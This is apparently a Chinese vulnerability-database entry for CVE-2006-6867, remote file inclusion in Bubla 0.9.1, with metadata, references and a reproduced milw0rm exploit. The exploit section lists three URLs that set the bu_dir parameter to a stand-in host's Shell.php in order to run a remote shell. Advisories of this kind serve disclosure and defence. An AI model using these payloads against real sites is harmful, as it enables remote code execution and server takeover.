Vladimir Menshakov buratinable templator 多个远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111909 漏洞类型 输入验证
发布时间 2006-12-31 更新时间 2007-01-04
CVE编号 CVE-2006-6867 CNNVD-ID CNNVD-200612-668
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/3059
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200612-668
|漏洞详情
VladimirMenshakovburatinabletemplator(bubla)0.9.1存在多个PHP远程文件包含漏洞,远程攻击者可通过传给(1)bu/bu_claro.php,(2)bu/bu_cache.php或(3)bu/bu_parse.php的bu_dir参数内的URL来执行任意PHP代码。
|漏洞EXP
**********************************************************************************************************
                                              DeltasecurityTEAM
                                              WwW.Deltasecurity.iR
**********************************************************************************************************

* Portal Name = Bubla 0.9.1

* Class = Remote File Inclusion

* Risk = High (Remote File Execution)

* Download = http://download.sourceforge.net/pub/sourceforge/b/bu/bubla/bubla-0.9.1.tar.gz

* Discoverd By = DeltahackingTEAM

* User In Delta Team = Davood_Cracker

* Conatact = Davood_cracker@yahoo.com

* 128 Bit Security Server= www.takserver.ir

* Just Delta Hacking Security TEAM *
--------------------------------------------------------------------------------------------

- Exploit:


http://localhost/[PATH]/bu/bu_claro.php?bu_dir=http://evilsite/Shell.php?
http://localhost/[PATH]/bu/bu_cache.php?bu_dir=http://evilsite/Shell.php?
http://localhost/[PATH]/bu/bu_parse.php?bu_dir=http://evilsite/Shell.php?
--------------------------------------------------------------------------------------------

Gr33tz : Dr.Trojan , Hiv++ , D_7j , Vpc

SP TNX : Dr.Pantagon

**********************************************************************************************************

# milw0rm.com [2006-12-31]
|参考资料

来源:XF
名称:bubla-process-file-include(31135)
链接:http://xforce.iss.net/xforce/xfdb/31135
来源:BID
名称:21838
链接:http://www.securityfocus.com/bid/21838
来源:MILW0RM
名称:3059
链接:http://www.milw0rm.com/exploits/3059
来源:VUPEN
名称:ADV-2006-5195
链接:http://www.frsirt.com/english/advisories/2006/5195
来源:SECUNIA
名称:23570
链接:http://secunia.com/advisories/23570
来源:XF
名称:bubla-budir-file-include(31201)
链接:http://xforce.iss.net/xforce/xfdb/31201
来源:MILW0RM
名称:3059
链接:http://milw0rm.com/exploits/3059